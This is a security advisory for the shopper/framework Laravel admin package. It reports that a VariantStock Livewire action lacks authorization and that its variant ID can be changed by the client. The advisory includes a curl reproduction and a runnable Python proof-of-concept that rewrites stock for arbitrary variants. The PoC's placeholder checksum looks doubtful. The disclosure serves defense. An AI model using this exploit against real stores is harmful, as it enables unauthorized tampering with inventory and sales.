Skip to content

Unauthorized inventory stock manipulation via unlocked variant property in VariantStock component

High
mckenziearts published GHSA-g3f9-g5vj-p62f Jun 22, 2026

Package

composer shopper/framework (Composer)

Affected versions

< 2.9.2

Patched versions

2.9.2

Description

Title

Unauthorized inventory stock manipulation via unlocked variant property in VariantStock component

Description

I found a lack of authorization control on the stockAction() method in packages/admin/src/Livewire/Components/Products/VariantStock.php. The component exposes a public $variant property without the #[Locked] attribute, so the variant ID is client-mutable via the Livewire wire payload. The stockAction() returns an Action with no ->authorize(...) chain, meaning any authenticated admin-panel session, including browse-only staff who hold zero edit permissions, can call this action to adjust inventory levels for any product variant. The combination of missing authorization and an unlocked model binding lets the attacker both bypass the permission gate and redirect the mutation to an arbitrary variant in the database.

Severity

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H Score: 8.1 (High)

Affected files

  • packages/admin/src/Livewire/Components/Products/VariantStock.php:34-91
// Line 34 - unprotected, client-mutable variant binding
public $variant;

// Lines 36-91 - no ->authorize(...) on the Action
public function stockAction(): Action
{
    return Action::make('stock')
        ->label(__('shopper::forms.actions.update'))
        ->color('gray')
        ->icon(Untitledui::Package)
        ->modalHeading(__('shopper::pages/products.modals.variants.title'))
        ->modalWidth(Width::Large)
        ->schema([
            Select::make('inventory')
                ->label(__('shopper::pages/products.inventory_name'))
                ->options(Inventory::query()->pluck('name', 'id'))
                ->native(false)
                ->required(),
            TextInput::make('quantity')
                ->label(__('shopper::forms.label.quantity'))
                ->placeholder('-10 or -5 or 50, etc')
                ->numeric()
                ->required(),
        ])
        ->action(function (array $data): void {
            // ...calls $this->variant->mutateStock(...) or decreaseStock(...)
            // with no permission check anywhere in this path
        });
}

Steps to reproduce

Prerequisites: an admin-panel account with any role (including a role that holds only browse_products or browse_orders). No edit_product_variants permission is required.

# Step 1: Log in and obtain a session cookie and Livewire CSRF token.
# Obtain them from a normal browser login, then use them below.

SESSION="laravel_session=<your_session_value>"
XSRF="X-XSRF-TOKEN: <url-decoded-value-of-XSRF-TOKEN-cookie>"

# Step 2: Load the product variant page for any variant ID (e.g., 1).
# Capture the Livewire snapshot from the page source.

# Step 3: Call the stock action on an arbitrary variant.
# The wire payload sets "component.variant" to any variant ID in the database.

curl -s -X POST http://localhost/shopper/livewire/update \
  -H "Content-Type: application/json" \
  -H "$XSRF" \
  -H "Cookie: $SESSION" \
  -d '{
    "components": [{
      "snapshot": "{\"id\":\"VARIANT_STOCK_COMPONENT_ID\",\"data\":{\"variant\":42},\"checksum\":\"...\"}",
      "updates": {},
      "calls": [{"path":"","method":"callAction","params":["stock",{"inventory":1,"quantity":999}]}]
    }]
  }'
# Expected: HTTP 200, variant 42 stock increased by 999 regardless of caller permissions.

Proof of concept

#!/usr/bin/env python3
"""
VariantStock authorization bypass PoC.

Set these environment variables before running:
  BASE_URL        e.g. http://localhost
  SESSION_COOKIE  value of the laravel_session cookie
  XSRF_TOKEN      URL-decoded value of the XSRF-TOKEN cookie
  COMPONENT_ID    Livewire component snapshot ID (from page source)
  VARIANT_ID      integer ID of any target variant
  INVENTORY_ID    integer ID of the target inventory location
  QUANTITY        integer quantity adjustment (positive or negative)
"""

import json
import os
import requests

base_url      = os.environ['BASE_URL']
session       = os.environ['SESSION_COOKIE']
xsrf          = os.environ['XSRF_TOKEN']
component_id  = os.environ['COMPONENT_ID']
variant_id    = int(os.environ['VARIANT_ID'])
inventory_id  = int(os.environ['INVENTORY_ID'])
quantity      = int(os.environ['QUANTITY'])

headers = {
    'Content-Type': 'application/json',
    'Accept': 'text/html, application/xhtml+xml',
    'X-XSRF-TOKEN': xsrf,
    'Cookie': f'laravel_session={session}',
    'X-Livewire': '1',
}

snapshot = json.dumps({
    'id': component_id,
    'data': {'variant': variant_id},
    'checksum': 'UNLOCKED_PROP_NO_CHECKSUM_NEEDED',
})

payload = {
    'components': [{
        'snapshot': snapshot,
        'updates': {},
        'calls': [{
            'path': '',
            'method': 'callAction',
            'params': ['stock', {
                'inventory': inventory_id,
                'quantity': quantity,
            }]
        }]
    }]
}

r = requests.post(f'{base_url}/shopper/livewire/update', headers=headers, json=payload)
print(f'Status: {r.status_code}')
print(r.text[:500])

Impact

Any authenticated admin panel user, regardless of role, can set the inventory quantity of any product variant to an arbitrary value. A browse-only staff member holding only browse_products can zero out stock for every variant (triggering out-of-stock states store-wide) or inflate stock counts to bypass stock-gating at checkout. Because $variant is not locked, the attacker is not limited to variants visible on their current page; they can target any variant by its integer ID.

Suggested fix

// packages/admin/src/Livewire/Components/Products/VariantStock.php

use Livewire\Attributes\Locked;

#[Locked]                     // prevent client-side ID substitution
public $variant;

public function stockAction(): Action
{
    return Action::make('stock')
        ->authorize('edit_product_variants')   // add this
        // ... rest of the action

Credits

Reported by Vishal Shukla (@shukla304 / @therawdev).

Sponsorship

This audit is from an AI-assisted research agent I'm building at sechub.dev. Running it on OSS projects is free for maintainers; sponsoring funds the model API costs that keep these audits flowing. Appreciated either way.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

CVE ID

CVE-2026-56829

Weaknesses

Missing Authorization

The product does not perform an authorization check when an actor attempts to access a resource or perform an action. Learn more on MITRE.

Credits